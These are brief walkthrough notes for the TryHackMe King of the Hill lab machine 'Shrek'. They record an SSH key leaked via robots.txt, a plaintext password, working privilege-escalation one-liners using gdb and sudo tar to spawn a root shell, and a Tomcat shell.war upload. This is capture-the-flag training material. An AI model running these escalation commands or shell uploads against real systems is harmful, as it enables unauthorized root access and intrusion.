Shrek

TryHackMe KoTH Machine - Shrek

TryHackMe | Cyber Security TrainingTryHackMe

---

Login with id_rsa found in /robots.txt - ( user shrek )

*** Privilege escalation of shrek user ***

gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit

get credentials for ftp login

Login via ftp -

get message.txt

Login with - ( user donkey )

ssh -T donkey@shrek.thm

pass `J5rURvCa8DyTg3vR`

Privilege Escalation - ( suid tar )

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Apache tomcat

user `admin`
pass ``

upload shell.war

Hidden Directories

/upload
/cms
/api

PORT 80

Navigate to http://shrek.thm/cms/admin